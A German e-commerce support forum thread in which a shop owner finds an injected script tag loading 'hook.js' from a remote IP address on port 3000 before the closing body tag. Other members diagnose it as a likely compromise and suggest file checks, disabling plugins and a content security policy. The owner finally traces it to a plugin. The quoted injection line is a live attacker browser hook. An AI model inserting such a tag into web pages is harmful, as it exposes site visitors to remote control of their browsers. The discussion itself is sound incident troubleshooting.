Neu Script - Fehler im Code

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, seit Tagen werden die Bilder auf unseren Produktseiten extrem langsam geladen. Bei der Suche nach dem Fehler sind wir beim Validieren von HTML auf diese Zeile gestoßen:
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
Vor dem Ende-Tag steht diese Bezeichnung <\/script>, die als Fehler gemeldet wird.

Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?

vg Georg
 

Nicson

Sehr aktives Mitglied
29. August 2012
516
94
Bayern
Also wenn dein Server nich zufällig in Schweden steht ... würde ich sagen das is n Hack ...?

8 34 ms 33 ms 33 ms adm-b2-link.telia.net [62.115.141.63]
9 33 ms 47 ms 33 ms digitalocean-ic-304182-adm-b2.c.telia.net [213.248.84.118]
10 35 ms 33 ms 33 ms 138.197.250.47
11 32 ms 32 ms 32 ms 37.139.8.73

Sieht nach nem privaten Provideranschluss aus.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Danke für die Hinweise.
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
 

FPrüfer

Moderator
Mitarbeiter
19. Februar 2016
1.881
529
Halle
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
Wie Martin schon sagte, das ist kein Bestandteil des Shopcodes, deshalb kann auch keiner wissen wo das herkommt. Möglich ist ein Plugin oder wie auch schon erwähnt hat jemand deinen Server kompromitiert und irgendwo Code eingeschleußt.
Erste Anlaufstelle wäre also der Dateicheck im Backend und das Deaktivieren aller Plugins. Je nach Ergebnis gehts dann weiter...
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Vielleicht solltest du nebenbei auch gleich die content policy für deine domain setzen.
Dann wird die Datei wenigstens schon mal nicht mehr ausgeführt bzw. geblockt, bis du die Herkunft des codes gefunden hast.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, bin nochmal zu diesem Thema hier.
Im Quelltext unseres Shops www.flammkuchen24.de wird vor dem body-end-tag folgendes Script aufgerufen aber nicht ausgeführt mit dem Hinweis: "Laden fehlgeschlagen für das <script> mit der Quelle "https://37.139.8.73:3000/hook.js" ". Der Vorgang bremst den Seitenaufruf extrem aus.

Dies ist das Script vor dem body-end-tag
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
</body>
</html>

Wie kann ich den Quelltext oder das auslösende Element aufrufen, damit ich das Script löschen kann?
vg Georg
 

Xantiva

Sehr aktives Mitglied
28. August 2016
1.795
316
Düsseldorf
Hast Du schon mal im Backend den Dateicheck ausgeführt? System : Wartung : Status => Dateistruktur => Details oder /admin/filecheck.php

Oder laden den SourceCode vom Shop runter und vergleiche mit Tools wie WinMerge den original Quellcode mit Deiner Version.

Nachtrag: Prüfe - wenn möglich - das ftp Log um zu sehen, ob und welche Dateien modifiziert wurden.
 

css-umsetzung

Offizieller Servicepartner
SPBanner
6. Juli 2011
8.583
2.668
Berlin
Firma
css-umsetzung
schalt doch mal alle Plugins ab die du hast um zu sehen ob das JS davon kommt, wenn nicht musst du in deinen Quellcodes schauen
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Dateicheck habe ich durchgeführt: keine Probleme entdeckt.

@css-umsetzung: "wenn nicht musst du in deinen Quellcodes schauen " = Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen. Wie komme ich an die entsprechende Stellem um das Script dort hzu entfernen.
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen.

Deine erste Frage sollte sein: Wie kann ich den Code finden?
Damit klärt sich erst mal, wo der überhaupt ist.

DANN: WIE kann ich den löschen? Das dürfte sich dann recht schnell machen lassen.

und das wichtigste: Wo kommt der eig. her? Warum ist der da? Wer hat ihn platziert? (Darum ja das "schalt mal alle Plugins ab")
Wenn der dabei verschwindet und du Deine Plugins nacheinander wieder aktivierst, solltest du den "schuldigen" finden.


EDIT - zum wie finden:
Solltest Du shell-Zugriff haben, such doch mal recursiv nach dem Code in deinem Serververzeichis - natürlich nach Dateiinhalt suchen.
Wenn nicht, lade dir den Shop doch mal runter (ohne Bilder usw.) und mach das offline
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Bei letzten Test hatte ich etwas übersehen. Als ich jetzt die Plugins nochmal geprüft habe, habe ich ein Plugin als Fehlerquelle gefunden!
Ich danke allen für Ihre Unterstützung.
 

Rico Giesler

Offizieller Servicepartner
SPBanner
10. Mai 2017
13.245
1.526
Wenn es ein Standardplugin ist wäre für andere User interessant welches.
Damit sie beim gleichen Problem einen Lösungsansatz haben.
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Database connection timeouts and interface lag in JTL-Wawi with background script managers User helfen Usern 0
Neu DHL Versenden 4.0 Fehler: Please enter a house number JTL-ShippingLabels - Fehler und Bugs 5
Neu 500er Fehler im Shop nach aktivierung des Nova Child Templates für JTL-Shop 3
Neu Rechte-Fehler im J10n Modul und Auswirkung auf base.mo.php in div. Plugins (Shop 5.7.1) JTL-Shop - Fehler und Bugs 0
Neu Shop zeigt keine Artikel mehr Fehler 500 Betrieb / Pflege von JTL-Shop 9
Neu Paypal 2.2.1; Fehler "Der Zahlungsanbieter hat eine Anmeldung gefordert" Plugins für JTL-Shop 0
Neu Keine Warenpost Int. Labels hsCode - Fehler? JTL-ShippingLabels - Fehler und Bugs 8
Fehler mit Zahlungsabgleich JTL-Wawi 1.11 11
Neu JTL-Wawi Shopabgleich per E-Mail überwachen (Warnungen & Fehler) Onlineshop-Anbindung 1
Fehler beim Abgleich mit Amazon JTL-Wawi 2.0 10
Fehler nach Update auf Version 1.11.11 und 2.0.4 JTL-Wawi 2.0 7
Neu DHL 4.0 Versandexport Fehler JTL-ShippingLabels - Ideen, Lob und Kritik 13
Fehler beim Abgleich mit dem JTL-Shop JTL-Wawi 2.0 12
Neu Seltsamer Fehler bei PayPal-Checkout: "Warenkorb enthielt Vaterartikel..." JTL-Shop - Fehler und Bugs 2
Neu PayPal Plugin wirft Fehler auf einmal wegen telefonnummer JTL-Shop - Fehler und Bugs 3
Neu Fehler DHL 4.0 Höherversicherung JTL-ShippingLabels - Fehler und Bugs 4
Neu DHL 4.0 Fehler "Please Enter Name 1" JTL-ShippingLabels - Fehler und Bugs 3
Problem mit Hermes Österreich Sendungsnummern – Fehler beim Amazon-Abgleich in JTL-Wawi JTL-Wawi 1.10 0
Neu Shop gesperrt - Webspace überschritten - Zusatzspace buchen bringt Fehler - Support fühlt sich nicht zuständig Betrieb / Pflege von JTL-Shop 7
hipping 4.0 gibt fehler: Error converting value 500 to type 'Shipping.DHL.GKVAPI40.Shared.RequestStatus'. Path 'status', line 1, position 13. JTL-Wawi 1.11 3
Neu DHL Versenden 4.0 HS Code-Fehler bei Freiposition JTL-ShippingLabels - Fehler und Bugs 14
DHL Versenden 4.0 nicht vollständig konfigurierbar (GUI Fehler) JTL-Wawi 2.0 5
Neu Der Inhalt / Text ist verschwunden – ist das ein Fehler JTL-Shop - Fehler und Bugs 0
Neu Shopware 5 + JTL-Connector: sporadische 500 Fehler / PHP-FPM Limit erreicht – trotz unverändertem Setup User helfen Usern - Fragen zu JTL-Wawi 0
Neu Fehler Rechnungsupload Amazon FBA Business Kunde JTL-Wawi - Fehler und Bugs 0
Gelöst: Shipping 4.0 gibt fehler: The product entered is unknown. JTL-Wawi 1.11 6
Neu Error 500 Fehler nach Dropper Installation Betrieb / Pflege von JTL-Shop 2
JTL-Wawi 1.11.7 Sporadischer Fehler - Zugriff verweigert. JTL-Wawi 1.11 4
Neu VCS Lite / IDU blockiert – Aufträge fälschlich unter "Externe Rechnungen" (Amazon API Fehler) Amazon-Anbindung - Fehler und Bugs 9
Fehler bei Bearbeitung von Attributen via HTML-Editor JTL-Wawi 2.0 3
Neu Produkt-Upload schlägt fehl nach Shopware-Update 6.7.9.0 – Fehler bei quantityStart (SaaS-Connector) Shopware-Connector 14
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 500 Upgrade JTL-Shop4 auf JTL-Shop5 2
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 404 Upgrade JTL-Shop4 auf JTL-Shop5 11
Neu Etikettendruck über Remotedesktop Fehler Arbeitsabläufe in JTL-Wawi 0
Nach Update auf Wawi 2.0.X, API v1 Fehler JTL-Wawi 2.0 9
Neu Fehler Scan Barcodes GTIN13 auf einem Lotto-Kundenbeleg JTL-POS - Fehler und Bugs 4
Update auf 2.0.1 Fehler bei eazybusiness JTL-Wawi 2.0 17
Gelöst Störung: DHL Versenden 3.0 - Fehler "Request processing failure" Gelöste Themen in diesem Bereich 1
Neu Fehler beim Update der Datenbank von 1.11.7 auf 2.0.1 JTL-Wawi - Fehler und Bugs 7
Neu JTL Shipping Fehler bei DHL Versand über WMS ? User helfen Usern - Fragen zu JTL-Wawi 2
Neu Datamatrix QR-Code scannen JTL-POS - Fragen zu Hardware 0
GLS Retoure Code 15 JTL-Wawi 1.10 1

Ähnliche Themen